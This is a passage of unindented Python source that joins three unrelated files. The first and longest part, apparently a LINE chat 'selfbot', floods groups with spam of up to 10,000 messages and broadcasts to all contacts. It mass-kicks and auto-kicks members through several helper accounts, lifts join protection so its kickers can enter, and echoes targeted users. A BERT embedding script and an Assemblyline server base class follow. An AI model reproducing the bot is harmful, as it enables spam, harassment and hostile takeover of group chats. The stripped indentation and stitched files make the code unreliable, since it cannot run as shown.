klist=[ki,kk,kc,ks,kt]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Tᵘʰ ᵏᵃᵃⁿ Cʳᵒᵗˢ...😃")
#================================================
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=======================================
#-------------------Spam functions start--------------------------
elif "Spam change:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam change:","")
cl.sendText(msg.to,"spam changed")
elif "Spam add:" in msg.text:
if msg.from_ in admin:
wait["spam"] = msg.text.replace("Spam add:","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam:" in msg.text:
if msg.from_ in admin:
strnum = msg.text.replace("Spam:","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
#-------------------Spam functions finish----------------------------
#-----------------------------------------------
#-----------------------------------------------
elif 'apakah' in msg.text.lower():
if msg.from_ in admin:
tanya = msg.text.lower().replace("apakah","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
#================================================
#===============================================
#=================================================
elif "Spamg " in msg.text:
if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spamg "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------------------------------------
elif "Steal mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Steal mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#========================================
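# Masuk!: temporarily disables the group's ticket protection so all helper bots can join via ticket, then locks it again.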
elif msg.text in ["Masuk!"]:
if msg.from_ in admin:
G = cl.getGroup(msg.to)
info = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
kt.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0001)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "All_Kickers_Ok!"
#=====================================================================================
elif msg.text in ["Bye allgroups"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
#cl.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
ks.leaveGroup(i)
kt.leaveGroup(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"bye-bye")
else:
ki.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Pulang!"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
kt.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Center @bye"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
try:
cl.sendMessage(msg.to,"bye-bye")
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Nk "]:
if msg.from_ in admin:
mk0 = msg.text.replace("Nk ","")
mk1 = mk0.lstrip()
mk2 = mk1.replace("@","")
mk3 = mk2.rstrip()
_name = mk3
gs = ki.getGroup(msg.to)
targets = []
for h in gs.members:
if _name in h.displayName:
targets.append(h.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
if target != msg.from_:
ki.kickoutFromGroup(msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#==========================================
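# youtube uses the yt() helper to return search results; Vidio scrapes the first YouTube result with BeautifulSoup and sends the video itself.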
elif "youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
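# Mimic: when mimic["status"] is on, messages from users in mimic["target"] are echoed back by the bot (see the op.type 26 handler below).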
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
#==========================================
elif msg.text in ["Purge"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"group purge")
return
for jj in matched_list:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-----------------------------------------------------------
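# Blacklist management: Ban/Unban by display name, Banned/Unbanned via contact, Banlist listing; the blacklist is persisted to st2__b.json.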
elif "Ban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[BL]ok"
_name = msg.text.replace("Ban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Success Masuk daftar orang bejat Boss")
except:
cl.sendText(msg.to,"Error")
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[WL]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found.")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Sudah di keluarkan dari daftar bejat Boss")
except:
cl.sendText(msg.to,"There was no blacklist user")
elif msg.text in ["Clear banlist"]:
if msg.from_ in admin:
wait["blacklist"] = {}
cl.sendText(msg.to,"succes clear all banlist")
elif msg.text in ["Banned"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Unbanned"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"send contact to ban")
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"nothing")
else:
cl.sendText(msg.to,"blacklist user list")
mc = "[⎈]Blacklist User[⎈]\n"
for mi_d in wait["blacklist"]:
mc += "[✗] " + cl.getContact(mi_d).displayName + " \n"
cl.sendText(msg.to, mc + "")
#=============================================
# ----------------- Ban members by tag (works with multiple tagged members)
elif ("Ban repeat " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned ")
except:
pass
#============================================
#elif msg.text in ["Clear"]:
#if msg.toType == 2:
#group = cl.getGroup(msg.to)
#gMembMids = [contact.mid for contact in group.invitee]
#for _mid in gMembMids:
#random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
#cl.sendText(msg.to,"Clear boss!!!")
elif "!!!" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//500
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*500 : (j+1)*500]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
#===========================================
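# Group-name protection: when a protected group's name changes (op.param3 == "1"), restore the stored name and blacklist whoever changed it.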
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
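# op.type 26 (incoming message): mimic relay for targeted users, plus an auto-reply when this account is mentioned while "tag" mode is on.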
if op.type == 26:
msg=op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
if op.type == 26:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = (cl.getProfile().displayName+" sedang sibuk/Off \nPenting Chat aja 👇👇👇")
jawaban = (jawab)
cl.sendText(msg.to,jawaban)
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
if op.type == 32:
OWN = "u78e5efff85bf97393cc2c4b8ecf93d25"
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
kt.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n╠" + Name
wait2['ROM'][op.param1][op.param2] = "╠" + Name
else:
pass
except:
pass
#------------------------
if op.type == 59:
print op
except Exception as error:
print error
def autoSta():
count = 1
while True:
try:
for posts in cl.activity(1)["result"]["posts"]:
if posts["postInfo"]["liked"] is False:
if wait["likeOn"] == True:
cl.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ki.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kk.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kc.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
ks.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
kt.like(posts["userInfo"]["writerMid"], posts["postInfo"]["postId"], 1001)
if wait["commentOn"] == True:
if posts["userInfo"]["writerMid"] in wait["commentBlack"]:
pass
else:
cl.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ki.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kk.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kc.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
ks.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
kt.comment(posts["userInfo"]["writerMid"],posts["postInfo"]["postId"],wait["comment"])
except:
count += 1
if(count == 50):
sys.exit(0)
else:
pass
thread1 = threading.Thread(target=autoSta)
thread1.daemon = True
thread1.start()
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
def likefriend():
for zx in range(0,20):
hasil = cl.activity(limit=20)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil ['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.60)
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
extract_feature.py
|
import modeling
import tokenization
from graph import optimize_graph
import args
from queue import Queue
from threading import Thread
import tensorflow as tf
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
class InputExample(object):
def __init__(self, unique_id, text_a, text_b):
self.unique_id = unique_id
self.text_a = text_a
self.text_b = text_b
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids):
self.unique_id = unique_id
self.tokens = tokens
self.input_ids = input_ids
self.input_mask = input_mask
self.input_type_ids = input_type_ids
class BertVector:
def __init__(self, batch_size=32):
"""
init BertVector
:param batch_size: batch size; choose it to fit your available memory (default is 32)
"""
self.max_seq_length = args.max_seq_len
self.layer_indexes = args.layer_indexes
self.gpu_memory_fraction = 1
self.graph_path = optimize_graph()
self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
self.batch_size = batch_size
self.estimator = self.get_estimator()
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
self.predict_thread.start()
def get_estimator(self):
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.run_config import RunConfig
from tensorflow.python.estimator.model_fn import EstimatorSpec
def model_fn(features, labels, mode, params):
with tf.gfile.GFile(self.graph_path, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
input_names = ['input_ids', 'input_mask', 'input_type_ids']
output = tf.import_graph_def(graph_def,
input_map={k + ':0': features[k] for k in input_names},
return_elements=['final_encodes:0'])
return EstimatorSpec(mode=mode, predictions={
'encodes': output[0]
})
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction
config.log_device_placement = False
config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1
return Estimator(model_fn=model_fn, config=RunConfig(session_config=config),
params={'batch_size': self.batch_size})
def predict_from_queue(self):
prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False)
for i in prediction:
self.output_queue.put(i)
def encode(self, sentence):
self.input_queue.put(sentence)
prediction = self.output_queue.get()['encodes']
return prediction
def queue_predict_input_fn(self):
return (tf.data.Dataset.from_generator(
self.generate_from_queue,
output_types={'unique_ids': tf.int32,
'input_ids': tf.int32,
'input_mask': tf.int32,
'input_type_ids': tf.int32},
output_shapes={
'unique_ids': (None,),
'input_ids': (None, self.max_seq_length),
'input_mask': (None, self.max_seq_length),
'input_type_ids': (None, self.max_seq_length)}).prefetch(10))
def generate_from_queue(self):
while True:
features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer))
yield {
'unique_ids': [f.unique_id for f in features],
'input_ids': [f.input_ids for f in features],
'input_mask': [f.input_mask for f in features],
'input_type_ids': [f.input_type_ids for f in features]
}
def input_fn_builder(self, features, seq_length):
"""Creates an `input_fn` closure to be passed to Estimator."""
all_unique_ids = []
all_input_ids = []
all_input_mask = []
all_input_type_ids = []
for feature in features:
all_unique_ids.append(feature.unique_id)
all_input_ids.append(feature.input_ids)
all_input_mask.append(feature.input_mask)
all_input_type_ids.append(feature.input_type_ids)
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
num_examples = len(features)
# This is for demo purposes and does NOT scale to large data sets. We do
# not use Dataset.from_generator() because that uses tf.py_func which is
# not TPU compatible. The right way to load data is with TFRecordReader.
d = tf.data.Dataset.from_tensor_slices({
"unique_ids":
tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32),
"input_ids":
tf.constant(
all_input_ids, shape=[num_examples, seq_length],
dtype=tf.int32),
"input_mask":
tf.constant(
all_input_mask,
shape=[num_examples, seq_length],
dtype=tf.int32),
"input_type_ids":
tf.constant(
all_input_type_ids,
shape=[num_examples, seq_length],
dtype=tf.int32),
})
d = d.batch(batch_size=batch_size, drop_remainder=False)
return d
return input_fn
def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
input_type_ids = features["input_type_ids"]
jit_scope = tf.contrib.compiler.jit.experimental_jit_scope
with jit_scope():
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=input_type_ids)
if mode != tf.estimator.ModeKeys.PREDICT:
raise ValueError("Only PREDICT modes are supported: %s" % (mode))
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,
init_checkpoint)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
all_layers = model.get_all_encoder_layers()
predictions = {
"unique_id": unique_ids,
}
for (i, layer_index) in enumerate(layer_indexes):
predictions["layer_output_%d" % i] = all_layers[layer_index]
from tensorflow.python.estimator.model_fn import EstimatorSpec
output_spec = EstimatorSpec(mode=mode, predictions=predictions)
return output_spec
return model_fn
def convert_examples_to_features(self, seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
features = []
input_masks = []
examples = self._to_example(self.input_queue.get())
for (ex_index, example) in enumerate(examples):
tokens_a = tokenizer.tokenize(example.text_a)
# if the sentence is longer than seq_length - 2, keep only its left part (two slots are reserved for [CLS] and [SEP])
if len(tokens_a) > seq_length - 2:
tokens_a = tokens_a[0:(seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
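# Illustrative example (added for clarity): for the single sentence
# "the dog is hairy" with a large enough seq_length, the code below builds
#   tokens:         [CLS] the dog is hairy . [SEP]
#   input_type_ids:   0    0   0  0    0   0   0
#   input_mask:       1    1   1  1    1   1   1   (then zero-padded up to seq_length)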
tokens = []
input_type_ids = []
tokens.append("[CLS]")
input_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
input_type_ids.append(0)
tokens.append("[SEP]")
input_type_ids.append(0)
# Where "input_ids" are tokens's index in vocabulary
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
input_masks.append(input_mask)
# Zero-pad up to the sequence length.
while len(input_ids) < seq_length:
input_ids.append(0)
input_mask.append(0)
input_type_ids.append(0)
assert len(input_ids) == seq_length
assert len(input_mask) == seq_length
assert len(input_type_ids) == seq_length
if ex_index < 5:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (example.unique_id))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info(
"input_type_ids: %s" % " ".join([str(x) for x in input_type_ids]))
yield InputFeatures(
unique_id=example.unique_id,
tokens=tokens,
input_ids=input_ids,
input_mask=input_mask,
input_type_ids=input_type_ids)
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
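# Illustrative trace (added for clarity): with max_length=6, tokens_a of length 5
# and tokens_b of length 4, the loop pops from a, then b, then a again, leaving
# both at length 3 so that len(tokens_a) + len(tokens_b) == 6.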
@staticmethod
def _to_example(sentences):
import re
"""
sentences to InputExample
:param sentences: list of strings
:return: list of InputExample
"""
unique_id = 0
for ss in sentences:
line = tokenization.convert_to_unicode(ss)
if not line:
continue
line = line.strip()
text_a = None
text_b = None
m = re.match(r"^(.*) \|\|\| (.*)$", line)
if m is None:
text_a = line
else:
text_a = m.group(1)
text_b = m.group(2)
yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)
unique_id += 1
if __name__ == "__main__":
bert = BertVector()
# while True:
# question = input('question: ')
vectors = bert.encode(['你好', '哈哈'])
print(str(vectors))
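# --- Hypothetical follow-up (not part of the original script) ---
# A common use of the returned matrix is comparing the two sentences by cosine
# similarity. This assumes `encode()` yields a 2-D array with one row per input
# sentence, which depends on how the frozen graph pools its output.
def _cosine_similarity(a, b):
    # plain cosine similarity between two 1-D vectors
    import numpy as np
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))
# e.g. print(_cosine_similarity(vectors[0], vectors[1]))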
|
server_base.py
|
"""
A base classes and utilities to provide a common set of behaviours for
the assemblyline core server nodes.
"""
import enum
import time
import threading
import logging
import signal
import sys
import io
import os
from typing import cast, Dict
from assemblyline.remote.datatypes import get_client
from assemblyline.remote.datatypes.hash import Hash
from assemblyline.odm.models.service import Service
from assemblyline.common import forge, log as al_log
SHUTDOWN_SECONDS_LIMIT = 10
# Don't write to the heartbeat file if it hasn't been at least this many seconds since the last write.
HEARTBEAT_TIME_LIMIT = 3
class ServerBase(threading.Thread):
"""Utility class for Assemblyline server processes.
Inheriting from thread so that the main work is done off the main thread.
This lets the main thread handle interrupts properly, even when the workload
makes a blocking call that would normally stop this.
"""
def __init__(self, component_name: str, logger: logging.Logger = None,
shutdown_timeout: float = SHUTDOWN_SECONDS_LIMIT, config=None):
super().__init__(name=component_name)
al_log.init_logging(component_name)
self.config = config or forge.get_config()
self.running = None
self.log = logger or logging.getLogger(component_name)
self._exception = None
self._traceback = None
self._shutdown_timeout = shutdown_timeout if shutdown_timeout is not None else SHUTDOWN_SECONDS_LIMIT
self._old_sigint = None
self._old_sigterm = None
self._stopped = False
self._last_heartbeat = 0
def __enter__(self):
self.log.info(f"Initialized")
return self
def __exit__(self, _exc_type, _exc_val, _exc_tb):
self.close()
if _exc_type is not None:
self.log.exception(f'Terminated because of an {_exc_type} exception')
else:
self.log.info(f'Terminated')
def __stop(self):
"""Hard stop, can still be blocked in some cases, but we should try to avoid them."""
time.sleep(self._shutdown_timeout)
self.log.error(f"Server has shutdown hard after waiting {self._shutdown_timeout} seconds to stop")
if not self._stopped:
self._stopped = True
exit(1) # So any static analysis tools get the behaviour of this function 'correct'
import ctypes
ctypes.string_at(0) # SEGFAULT out of here
def close(self):
pass
def interrupt_handler(self, signum, stack_frame):
self.log.info(f"Instance caught signal. Coming down...")
self.stop()
if signum == signal.SIGINT and self._old_sigint:
self._old_sigint(signum, stack_frame)
if signum == signal.SIGTERM and self._old_sigterm:
self._old_sigterm(signum, stack_frame)
def raising_join(self):
self.join()
if self._traceback and self._exception:
raise self._exception.with_traceback(self._traceback)
# noinspection PyBroadException
def run(self):
try:
self.try_run()
except Exception:
_, self._exception, self._traceback = sys.exc_info()
self.log.exception("Exiting:")
def serve_forever(self):
self.start()
self.join()
def start(self):
"""Start the server workload."""
self.running = True
super().start()
self.log.info(f"Started")
self._old_sigint = signal.signal(signal.SIGINT, self.interrupt_handler)
self._old_sigterm = signal.signal(signal.SIGTERM, self.interrupt_handler)
def stop(self):
"""Ask nicely for the server to stop.
After a timeout, a hard stop will be triggered.
"""
# The running loops should stop within a few seconds of this flag being set.
self.running = False
# If it doesn't stop within a few seconds, this other thread should kill the entire process
stop_thread = threading.Thread(target=self.__stop)
stop_thread.daemon = True
stop_thread.start()
def try_run(self):
pass
def heartbeat(self, timestamp: int = None):
"""Touch a special file on disk to indicate this service is responsive.
This should be called in the main processing loop of a component, calling it in
a background thread defeats the purpose. Ideally it should be called at least a couple
times a minute.
"""
if timestamp is not None:
timestamp = (timestamp, timestamp)
if self.config.logging.heartbeat_file:
# Only do the heartbeat every few seconds at most. If a fast component is
# calling this for every message processed we don't want to slow it down
# by doing a "disk" system call every few milliseconds
now = time.time()
if now - self._last_heartbeat < HEARTBEAT_TIME_LIMIT:
return
self._last_heartbeat = now
with io.open(self.config.logging.heartbeat_file, 'ab'):
os.utime(self.config.logging.heartbeat_file, times=timestamp)
def sleep_with_heartbeat(self, duration):
"""Sleep while calling heartbeat periodically."""
while duration > 0:
self.heartbeat()
sleep_time = min(duration, HEARTBEAT_TIME_LIMIT * 2)
time.sleep(sleep_time)
duration -= sleep_time
